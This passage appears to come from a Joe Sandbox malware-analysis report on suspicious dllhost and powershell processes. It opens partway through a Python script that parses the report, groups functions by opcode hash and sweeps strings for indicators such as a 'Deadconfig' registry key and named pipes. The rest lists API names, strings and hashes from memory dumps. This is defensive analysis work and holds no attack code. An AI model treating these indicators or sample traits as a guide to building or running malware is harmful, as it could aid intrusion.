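• API ID: Delete$CloseEnumOpen
• String ID: SOFTWARE\\Deadconfig
• Opcode ID: 52927092f250c1abcc012ba980f00c3e647031339fe99cddc7972e625cf8ff0d
• Instruction ID: 6458ae0190dc3c7e9ac23c9118509b32cf476b90947138c69e15ec66821d85a4
• Instruction Fuzzy Hash: 6C1186B2614A8486E761CF26F8447D92374F78C7D8F405205E75D4BAA9DF7CC258CB18
"""

def parse_records(text):
    """One dict per record; 'calls' and 'Associated' collect repeated lines."""
    records, cur = [], defaultdict(list)
    for line in text.splitlines():
        m = BULLET.match(line)
        if not m:
            continue                      # headings such as APIs, Strings, Similarity
        key, value = m.group(1).strip(), m.group(2).strip()
        if key.endswith(" ref"):          # APIs table row: "<call>, ref: <address>"
            cur["calls"].append((key[:-4].rstrip(","), value))
        elif key == "Associated":         # drop the page's "Download File" link text
            cur["Associated"].append(value.replace("Download File", "").strip())
        else:
            cur[key] = value
        if key == LAST_FIELD:
            records.append(dict(cur))
            cur = defaultdict(list)
    return records

def dump_name(rec):
    """Memory-dump file name: the Source File value up to its first comma."""
    return rec.get("Source File", "").split(",")[0].strip()

def shared_functions(records):
    """Opcode IDs present in more than one dump, as (opcode, api_id, dumps, instr_ids).

    Assumption drawn from the two _set_statfp records on this page: the Opcode ID
    hashes opcodes only while the Instruction ID also covers operands, so code that
    moved between dumps keeps its Opcode ID but gets a new Instruction ID.
    """
    by_opcode = defaultdict(list)
    for rec in records:
        if "Opcode ID" in rec:
            by_opcode[rec["Opcode ID"]].append(rec)
    out = []
    for opcode, recs in by_opcode.items():
        dumps = sorted({dump_name(r) for r in recs})
        if len(dumps) > 1:
            instr = sorted({r.get("Instruction ID", "") for r in recs})
            out.append((opcode, recs[0].get("API ID", ""), dumps, instr))
    return out

def flag_strings(records, indicators):
    """(API ID, string) pairs whose string contains an indicator; '$' separates strings."""
    hits = []
    for rec in records:
        for s in filter(None, rec.get("String ID", "").split("$")):
            if any(ind.lower() in s.lower() for ind in indicators):
                hits.append((rec.get("API ID", ""), s))
    return hits

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for opcode, api, dumps, instr in shared_functions(recs):
        print(f"{api}: Opcode ID {opcode[:16]}.. in {len(dumps)} dumps, {len(instr)} Instruction IDs")
    for api, s in flag_strings(recs, ["SOFTWARE\\Deadconfig", "\\\\.\\pipe\\"]):
        print(f"string {s!r} referenced by function with API ID {api}")
```

Run against the full report text instead of `SAMPLE`, `shared_functions` lists every function the plugin saw in more than one snapshot (useful for telling the CRT and loader stubs from the payload's own code), and `flag_strings` turns the String ID column into a quick indicator sweep over the registry paths, pipe names and module names the functions reference.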
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 1ea0a3f2df70a2c0dd36de768da3b30b9803f1d8226716545035a334e4554a43
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: C9115B2A744B81C2EF149B25E45C76AA2A8F78CB94F040069DFCD17795EF3DC588CB02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 000002E86A09D751
                                                        • TlsSetValue.KERNEL32(?,?,?,000002E86A09B50E,?,?,?,000002E86A09B969,?,?,?,?,000002E86A09BA1D), ref: 000002E86A09D768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: ntdll.dll
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                         • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                         • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: d4f02781868ac6ceed087ba3c348f65b03fc939797e1a8fb7640c434253b21e7
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: 36E0E575651A80C6EF089B62D80C259B7A5FB8CB15F488064CA4907321EE3884D98B12
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                        • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                        • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                        • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1870908153.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c201d4cfd947c2aab7d0f8068b6b05513b61ead7412ea2c731e6a76e8444ff3d
                                                        • Instruction ID: 22124d3102b84e47b5df20c261a9c811147bd372cfe714fff87cbbbdca53167f
                                                        • Opcode Fuzzy Hash: c201d4cfd947c2aab7d0f8068b6b05513b61ead7412ea2c731e6a76e8444ff3d
                                                        • Instruction Fuzzy Hash: 2ED15BA2A1FACE4FEB65DB6848645B5BBA0EF1A310B0901FED45DC70EBD914AC05C361
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 310f0f653dc7326ec8a24a186150ae98c1d9db7c3c148008fcedfe2b2858142a
                                                        • Instruction ID: 2b44eac253f6175dcb619a6cd3f78a1ba7da80aaa08a9f80c1ef281649782b7b
                                                        • Opcode Fuzzy Hash: 310f0f653dc7326ec8a24a186150ae98c1d9db7c3c148008fcedfe2b2858142a
                                                        • Instruction Fuzzy Hash: A461FB3190CB4C4FDB59DB6C9C4A6E97FF0EB96321F04426FD049C3162CA74685ACB92
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3cf533e3002681fd93f6d7b3b4bafe6ced6ad50ef3c09c115aed29b36cce6019
                                                        • Instruction ID: 7d15fb9dc37f07538d8a7f58cdd7a1e9d3d4ffb063fea4effa2528728e4bd29d
                                                        • Opcode Fuzzy Hash: 3cf533e3002681fd93f6d7b3b4bafe6ced6ad50ef3c09c115aed29b36cce6019
                                                        • Instruction Fuzzy Hash: 69415F71A0DB884FDB189F5C580A6B87BE0FF95710F40426FE098D7192DB24B915C7C2
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1868088648.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b6bd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 23505bc844504d0df81e75ce72b0316260e35760c988ad5ee5e0424bc8d78aa5
                                                        • Instruction ID: e4c086680ebbaaa04f90794beb4d5d7dd1ca31ff9139a28afee5550b0167ea2c
                                                        • Opcode Fuzzy Hash: 23505bc844504d0df81e75ce72b0316260e35760c988ad5ee5e0424bc8d78aa5
                                                        • Instruction Fuzzy Hash: 2D41297050EBC44FE7568B3898519523FF0EF56320B1506EFD098CF1A7C625A846CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                        • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                                        • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                        • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06fde61f72af5a0c16009eaecdfc218fa21df1d93e9270e15e243ae35ae8ef12
                                                        • Instruction ID: 1b596c0e12b13b7622aea8b57449bdbbe16ffb9b7016840186ba41f1e27fc817
                                                        • Opcode Fuzzy Hash: 06fde61f72af5a0c16009eaecdfc218fa21df1d93e9270e15e243ae35ae8ef12
                                                        • Instruction Fuzzy Hash: 34F0C23660AB8C4FDB52EF2C98654D57FA0FFA6641B0502ABD588CB072EB2159488781
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1870908153.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f12c3ca706bd90e4a6bd2c24f54174b913bdbb8b78bd1cfd2fb4760190f2314
                                                        • Instruction ID: 6626564ffef26f6823caca17d84527698f06c1c6a2ad1066fa11a5a4e5877c1f
                                                        • Opcode Fuzzy Hash: 0f12c3ca706bd90e4a6bd2c24f54174b913bdbb8b78bd1cfd2fb4760190f2314
                                                        • Instruction Fuzzy Hash: C5F0BE32B0E5498FDB68EB8CE4518E877E0EF5932071600BAE06DC71B3CA25EC41C750
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1870908153.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d48fd6a8806828cbf3084cea4ee9bafb79648d2541a87ea29e08a120dfc52e4b
                                                        • Instruction ID: d7d497ad5aafac53dbe409b1455c4dfd3f0c742d31521fdd0edb2363bf1b3ce9
                                                        • Opcode Fuzzy Hash: d48fd6a8806828cbf3084cea4ee9bafb79648d2541a87ea29e08a120dfc52e4b
                                                        • Instruction Fuzzy Hash: A0F05E32A0F5498FDB64EB5CE4618A877E0FF4932475600BAE15DCB4A3DA29BC41C750
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1870908153.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                        • Instruction ID: 09323d83657ad24737761ed45f903d87c673e9f131c1b1bb4a609df375895b1c
                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                        • Instruction Fuzzy Hash: D7E01A31B0C8088FDA78DB4CE0519A977E1EBA832171601BBD14EC7571CA22ED518B90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N_^$N_^$N_^$N_^$N_^
                                                        • API String ID: 0-1162251571
                                                        • Opcode ID: 8a58f7885fb3b7c48049ca84b228dd4b4dcbe855e120cc9a8ee1319338b6147b
                                                        • Instruction ID: 1ca6a916f09f9e7b84205c8306d708178fc27b6040ebbf63c805d2f5750f976c
                                                        • Opcode Fuzzy Hash: 8a58f7885fb3b7c48049ca84b228dd4b4dcbe855e120cc9a8ee1319338b6147b
                                                        • Instruction Fuzzy Hash: E441D6A2E4F7D64FD3228BA958690907FD0EF6226474E01FFC1998B173E9181A478706
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1869742700.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N_^4$N_^7$N_^F$N_^J
                                                        • API String ID: 0-3508309026
                                                        • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                        • Instruction ID: 33318d810732aedc5b8d73b2cd603b97cdeee6fc6f3f35bf73613f10f45d9dd5
                                                        • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                        • Instruction Fuzzy Hash: 3821497BB080654ED305BBBCBC289DD3750DFD423935642F2D2A9CB183EC14708A86C1

                                                        Execution Graph

                                                        Execution Coverage:3%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1117
                                                        Total number of Limit Nodes:14
